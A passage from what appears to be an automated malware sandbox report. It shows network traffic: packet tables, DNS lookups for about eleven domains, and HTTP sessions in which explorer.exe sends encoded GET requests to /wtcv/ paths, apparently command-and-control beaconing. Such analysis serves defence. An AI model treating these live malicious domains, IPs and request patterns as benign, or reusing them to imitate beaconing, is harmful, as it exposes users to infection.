                                                Nov 4, 2021 11:49:36.988871098 CET | 49774 | 80 | 192.168.2.6 | 172.67.184.156
                                                Nov 4, 2021 11:49:37.012037992 CET | 80 | 49774 | 172.67.184.156 | 192.168.2.6
                                                Nov 4, 2021 11:49:37.027247906 CET | 80 | 49774 | 172.67.184.156 | 192.168.2.6
                                                Nov 4, 2021 11:49:37.027307987 CET | 80 | 49774 | 172.67.184.156 | 192.168.2.6
                                                Nov 4, 2021 11:49:37.027590990 CET | 49774 | 80 | 192.168.2.6 | 172.67.184.156
                                                Nov 4, 2021 11:49:37.027663946 CET | 49774 | 80 | 192.168.2.6 | 172.67.184.156
                                                Nov 4, 2021 11:49:37.050609112 CET | 80 | 49774 | 172.67.184.156 | 192.168.2.6
                                                Nov 4, 2021 11:49:47.147589922 CET | 49776 | 80 | 192.168.2.6 | 104.248.163.187
                                                Nov 4, 2021 11:49:47.178508043 CET | 80 | 49776 | 104.248.163.187 | 192.168.2.6
                                                Nov 4, 2021 11:49:47.178898096 CET | 49776 | 80 | 192.168.2.6 | 104.248.163.187
                                                Nov 4, 2021 11:49:47.179642916 CET | 49776 | 80 | 192.168.2.6 | 104.248.163.187
                                                Nov 4, 2021 11:49:47.211309910 CET | 80 | 49776 | 104.248.163.187 | 192.168.2.6
                                                Nov 4, 2021 11:49:47.680707932 CET | 49776 | 80 | 192.168.2.6 | 104.248.163.187
                                                Nov 4, 2021 11:49:47.750653982 CET | 80 | 49776 | 104.248.163.187 | 192.168.2.6
                                                Nov 4, 2021 11:49:47.760755062 CET | 80 | 49776 | 104.248.163.187 | 192.168.2.6
                                                Nov 4, 2021 11:49:47.760783911 CET | 80 | 49776 | 104.248.163.187 | 192.168.2.6
                                                Nov 4, 2021 11:49:47.760900974 CET | 49776 | 80 | 192.168.2.6 | 104.248.163.187
                                                Nov 4, 2021 11:49:47.760941982 CET | 49776 | 80 | 192.168.2.6 | 104.248.163.187
                                                Nov 4, 2021 11:49:52.731015921 CET | 49777 | 80 | 192.168.2.6 | 46.38.243.234
                                                Nov 4, 2021 11:49:52.754976988 CET | 80 | 49777 | 46.38.243.234 | 192.168.2.6
                                                Nov 4, 2021 11:49:52.755201101 CET | 49777 | 80 | 192.168.2.6 | 46.38.243.234
                                                Nov 4, 2021 11:49:52.756943941 CET | 49777 | 80 | 192.168.2.6 | 46.38.243.234
                                                Nov 4, 2021 11:49:52.780973911 CET | 80 | 49777 | 46.38.243.234 | 192.168.2.6
                                                Nov 4, 2021 11:49:52.781173944 CET | 80 | 49777 | 46.38.243.234 | 192.168.2.6
                                                Nov 4, 2021 11:49:52.781208038 CET | 80 | 49777 | 46.38.243.234 | 192.168.2.6
                                                Nov 4, 2021 11:49:52.781493902 CET | 49777 | 80 | 192.168.2.6 | 46.38.243.234
                                                Nov 4, 2021 11:49:52.782634974 CET | 49777 | 80 | 192.168.2.6 | 46.38.243.234
                                                Nov 4, 2021 11:49:52.806570053 CET | 80 | 49777 | 46.38.243.234 | 192.168.2.6
                                                Nov 4, 2021 11:49:57.861294031 CET | 49778 | 80 | 192.168.2.6 | 138.68.74.116
                                                Nov 4, 2021 11:49:57.904347897 CET | 80 | 49778 | 138.68.74.116 | 192.168.2.6
                                                Nov 4, 2021 11:49:57.904489994 CET | 49778 | 80 | 192.168.2.6 | 138.68.74.116
                                                Nov 4, 2021 11:49:57.904726028 CET | 49778 | 80 | 192.168.2.6 | 138.68.74.116
                                                Nov 4, 2021 11:49:57.947076082 CET | 80 | 49778 | 138.68.74.116 | 192.168.2.6
                                                Nov 4, 2021 11:49:57.947346926 CET | 80 | 49778 | 138.68.74.116 | 192.168.2.6
                                                Nov 4, 2021 11:49:57.947367907 CET | 80 | 49778 | 138.68.74.116 | 192.168.2.6
                                                Nov 4, 2021 11:49:57.947566032 CET | 49778 | 80 | 192.168.2.6 | 138.68.74.116
                                                Nov 4, 2021 11:49:57.947731972 CET | 49778 | 80 | 192.168.2.6 | 138.68.74.116
                                                Nov 4, 2021 11:49:57.989968061 CET | 80 | 49778 | 138.68.74.116 | 192.168.2.6
                                                Nov 4, 2021 11:50:03.400053978 CET | 49779 | 80 | 192.168.2.6 | 35.246.6.109
                                                Nov 4, 2021 11:50:03.433895111 CET | 80 | 49779 | 35.246.6.109 | 192.168.2.6
                                                Nov 4, 2021 11:50:03.434012890 CET | 49779 | 80 | 192.168.2.6 | 35.246.6.109
                                                Nov 4, 2021 11:50:03.434360027 CET | 49779 | 80 | 192.168.2.6 | 35.246.6.109
                                                Nov 4, 2021 11:50:03.468027115 CET | 80 | 49779 | 35.246.6.109 | 192.168.2.6
                                                Nov 4, 2021 11:50:03.508599043 CET | 80 | 49779 | 35.246.6.109 | 192.168.2.6
                                                Nov 4, 2021 11:50:03.508635998 CET | 80 | 49779 | 35.246.6.109 | 192.168.2.6
                                                Nov 4, 2021 11:50:03.508655071 CET | 80 | 49779 | 35.246.6.109 | 192.168.2.6
                                                Nov 4, 2021 11:50:03.508694887 CET | 80 | 49779 | 35.246.6.109 | 192.168.2.6
                                                Nov 4, 2021 11:50:03.508887053 CET | 49779 | 80 | 192.168.2.6 | 35.246.6.109
                                                Nov 4, 2021 11:50:03.508944035 CET | 49779 | 80 | 192.168.2.6 | 35.246.6.109
                                                Nov 4, 2021 11:50:03.512593031 CET | 49779 | 80 | 192.168.2.6 | 35.246.6.109
                                                Nov 4, 2021 11:50:03.546569109 CET | 80 | 49779 | 35.246.6.109 | 192.168.2.6

                                                UDP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 4, 2021 11:49:10.172384977 CET | 51774 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:49:10.202804089 CET | 53 | 51774 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:49:15.357218981 CET | 56023 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:49:15.389322996 CET | 53 | 56023 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:49:20.540076017 CET | 58384 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:49:20.563623905 CET | 53 | 58384 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:49:25.845139980 CET | 56061 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:49:26.097970963 CET | 53 | 56061 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:49:36.942981958 CET | 58336 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:49:36.963466883 CET | 53 | 58336 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:49:42.073613882 CET | 53781 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:49:42.109395027 CET | 53 | 53781 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:49:47.123650074 CET | 54064 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:49:47.145673037 CET | 53 | 54064 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:49:52.706044912 CET | 52811 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:49:52.729083061 CET | 53 | 52811 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:49:57.837305069 CET | 55299 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:49:57.860071898 CET | 53 | 55299 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:50:03.351473093 CET | 63745 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:50:03.392386913 CET | 53 | 63745 | 8.8.8.8 | 192.168.2.6
                                                Nov 4, 2021 11:50:08.528608084 CET | 50055 | 53 | 192.168.2.6 | 8.8.8.8
                                                Nov 4, 2021 11:50:08.554653883 CET | 53 | 50055 | 8.8.8.8 | 192.168.2.6

                                                DNS Queries

                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                Nov 4, 2021 11:49:10.172384977 CET | 192.168.2.6 | 8.8.8.8 | 0x9f44 | Standard query (0) | www.worryterrible.space | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:15.357218981 CET | 192.168.2.6 | 8.8.8.8 | 0x646a | Standard query (0) | www.americanvisionvinyl.com | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:20.540076017 CET | 192.168.2.6 | 8.8.8.8 | 0x9f1f | Standard query (0) | www.iccsukltd.com | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:25.845139980 CET | 192.168.2.6 | 8.8.8.8 | 0x1e93 | Standard query (0) | www.harada-insatsu.com | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:36.942981958 CET | 192.168.2.6 | 8.8.8.8 | 0x3276 | Standard query (0) | www.affiliatemarketingproducts.xyz | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:42.073613882 CET | 192.168.2.6 | 8.8.8.8 | 0xd1e8 | Standard query (0) | www.dempseynutrition.com | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:47.123650074 CET | 192.168.2.6 | 8.8.8.8 | 0x226d | Standard query (0) | www.bezhantrading.com | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:52.706044912 CET | 192.168.2.6 | 8.8.8.8 | 0x1c5b | Standard query (0) | www.alles-abgedeckt.com | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:57.837305069 CET | 192.168.2.6 | 8.8.8.8 | 0x5d27 | Standard query (0) | www.leads-mania.club | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:50:03.351473093 CET | 192.168.2.6 | 8.8.8.8 | 0xbfb5 | Standard query (0) | www.tankomixing.com | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:50:08.528608084 CET | 192.168.2.6 | 8.8.8.8 | 0x7132 | Standard query (0) | www.sddn13.xyz | A (IP address) | IN (0x0001)

                                                DNS Answers

                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                Nov 4, 2021 11:49:10.202804089 CET | 8.8.8.8 | 192.168.2.6 | 0x9f44 | No error (0) | www.worryterrible.space | worryterrible.space | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:49:10.202804089 CET | 8.8.8.8 | 192.168.2.6 | 0x9f44 | No error (0) | worryterrible.space | - | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:15.389322996 CET | 8.8.8.8 | 192.168.2.6 | 0x646a | No error (0) | www.americanvisionvinyl.com | americanvisionvinyl.com | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:49:15.389322996 CET | 8.8.8.8 | 192.168.2.6 | 0x646a | No error (0) | americanvisionvinyl.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:20.563623905 CET | 8.8.8.8 | 192.168.2.6 | 0x9f1f | No error (0) | www.iccsukltd.com | - | 217.160.0.33 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:26.097970963 CET | 8.8.8.8 | 192.168.2.6 | 0x1e93 | No error (0) | www.harada-insatsu.com | harada-insatsu.com | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:49:26.097970963 CET | 8.8.8.8 | 192.168.2.6 | 0x1e93 | No error (0) | harada-insatsu.com | - | 153.127.214.206 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:36.963466883 CET | 8.8.8.8 | 192.168.2.6 | 0x3276 | No error (0) | www.affiliatemarketingproducts.xyz | - | 172.67.184.156 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:36.963466883 CET | 8.8.8.8 | 192.168.2.6 | 0x3276 | No error (0) | www.affiliatemarketingproducts.xyz | - | 104.21.68.12 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:42.109395027 CET | 8.8.8.8 | 192.168.2.6 | 0xd1e8 | Name error (3) | www.dempseynutrition.com | none | none | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:47.145673037 CET | 8.8.8.8 | 192.168.2.6 | 0x226d | No error (0) | www.bezhantrading.com | bezhantrading.com | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:49:47.145673037 CET | 8.8.8.8 | 192.168.2.6 | 0x226d | No error (0) | bezhantrading.com | - | 104.248.163.187 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:52.729083061 CET | 8.8.8.8 | 192.168.2.6 | 0x1c5b | No error (0) | www.alles-abgedeckt.com | - | 46.38.243.234 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:49:57.860071898 CET | 8.8.8.8 | 192.168.2.6 | 0x5d27 | No error (0) | www.leads-mania.club | leads-mania.club | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:49:57.860071898 CET | 8.8.8.8 | 192.168.2.6 | 0x5d27 | No error (0) | leads-mania.club | - | 138.68.74.116 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET | 8.8.8.8 | 192.168.2.6 | 0xbfb5 | No error (0) | www.tankomixing.com | www150.wixdns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET | 8.8.8.8 | 192.168.2.6 | 0xbfb5 | No error (0) | www150.wixdns.net | balancer.wixdns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET | 8.8.8.8 | 192.168.2.6 | 0xbfb5 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET | 8.8.8.8 | 192.168.2.6 | 0xbfb5 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET | 8.8.8.8 | 192.168.2.6 | 0xbfb5 | No error (0) | td-balancer-euw2-6-109.wixdns.net | - | 35.246.6.109 | A (IP address) | IN (0x0001)
                                                Nov 4, 2021 11:50:08.554653883 CET | 8.8.8.8 | 192.168.2.6 | 0x7132 | No error (0) | www.sddn13.xyz | sddn13.xyz | - | CNAME (Canonical name) | IN (0x0001)
                                                Nov 4, 2021 11:50:08.554653883 CET | 8.8.8.8 | 192.168.2.6 | 0x7132 | No error (0) | sddn13.xyz | - | 50.118.182.205 | A (IP address) | IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.worryterrible.space
                                                • www.americanvisionvinyl.com
                                                • www.iccsukltd.com
                                                • www.harada-insatsu.com
                                                • www.affiliatemarketingproducts.xyz
                                                • www.bezhantrading.com
                                                • www.alles-abgedeckt.com
                                                • www.leads-mania.club
                                                • www.tankomixing.com

                                                HTTP Packets

                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                0 | 192.168.2.6 | 49760 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:10.230787992 CET | 1211 | OUT | GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1
                                                Host: www.worryterrible.space
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:10.345949888 CET | 1211 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 04 Nov 2021 10:49:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "6182ae77-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                1 | 192.168.2.6 | 49766 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:15.409408092 CET | 5924 | OUT | GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.americanvisionvinyl.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:15.526365042 CET | 5924 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 04 Nov 2021 10:49:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "6182b3d6-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                2 | 192.168.2.6 | 49770 | 217.160.0.33 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:20.590734005 CET | 7551 | OUT | GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1
                                                Host: www.iccsukltd.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:20.613830090 CET | 7552 | IN | HTTP/1.1 302 Moved Temporarily
                                                Server: nginx
                                                Date: Thu, 04 Nov 2021 10:49:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 138
                                                Connection: close
                                                Location: https://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw==
                                                Expires: Thu, 04 Nov 2021 11:09:20 GMT
                                                Cache-Control: max-age=1200
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                3 | 192.168.2.6 | 49773 | 153.127.214.206 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:26.412220001 CET | 7561 | OUT | GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.harada-insatsu.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:27.061523914 CET  7561                IN         HTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Thu, 04 Nov 2021 10:49:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0


                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                4           192.168.2.6  49774        172.67.184.156   80                C:\Windows\explorer.exe
                                                Timestamp                           kBytes transferred  Direction  Data
                                                Nov 4, 2021 11:49:36.988871098 CET  7563                OUT        GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.affiliatemarketingproducts.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:37.027247906 CET  7564                IN         HTTP/1.1 301 Moved Permanently
                                                Date: Thu, 04 Nov 2021 10:49:37 GMT
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Thu, 04 Nov 2021 11:49:37 GMT
                                                Location: https://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SPswaYNzBNI3Kt4mtbfGsNGfaa%2FkZUQW2IRP4os7vY69Hkz9OlKNWJOADCzrBTJzBOFhRTVCuWC4G%2FBpJgHLPTtPcRGkhO%2B8zEWipfS%2BaMIRKeeVD0wb5edUjB31NBc2rZfYdeH8pNowyK5alp3qulaeUFLI"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 6a8d46d64fc84c5b-AMS
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                5           192.168.2.6  49776        104.248.163.187  80                C:\Windows\explorer.exe
                                                Timestamp                           kBytes transferred  Direction  Data
                                                Nov 4, 2021 11:49:47.179642916 CET  7569                OUT        GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.bezhantrading.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:47.760755062 CET  7570                IN         HTTP/1.1 301 Moved Permanently
                                                Connection: close
                                                content-type: text/html; charset=UTF-8
                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                cache-control: no-cache, must-revalidate, max-age=0
                                                x-redirect-by: WordPress
                                                location: http://bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0
                                                content-length: 0
                                                date: Thu, 04 Nov 2021 10:49:47 GMT
                                                server: LiteSpeed
                                                vary: User-Agent


                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                6           192.168.2.6  49777        46.38.243.234    80                C:\Windows\explorer.exe
                                                Timestamp                           kBytes transferred  Direction  Data
                                                Nov 4, 2021 11:49:52.756943941 CET  7571                OUT        GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1
                                                Host: www.alles-abgedeckt.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:52.781173944 CET  7571                IN         HTTP/1.1 404 Not Found
                                                Date: Thu, 04 Nov 2021 10:48:29 GMT
                                                Server: Apache/2.4.10 (Debian)
                                                Content-Length: 285
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.alles-abgedeckt.com Port 80</address></body></html>


                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                7           192.168.2.6  49778        138.68.74.116    80                C:\Windows\explorer.exe
                                                Timestamp                           kBytes transferred  Direction  Data
                                                Nov 4, 2021 11:49:57.904726028 CET  7572                OUT        GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.leads-mania.club
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:57.947346926 CET  7573                IN         HTTP/1.1 301 Moved Permanently
                                                Date: Thu, 04 Nov 2021 10:49:57 GMT
                                                Server: Apache/2.4.18 (Ubuntu)
                                                Location: https://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0
                                                Content-Length: 432
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&amp;g2ML=crBLeffhPhH0">here</a>.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.leads-mania.club Port 80</address></body></html>


                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                8           192.168.2.6  49779        35.246.6.109     80                C:\Windows\explorer.exe
                                                Timestamp                           kBytes transferred  Direction  Data
                                                Nov 4, 2021 11:50:03.434360027 CET  7574                OUT        GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1
                                                Host: www.tankomixing.com
                                                Connection: close
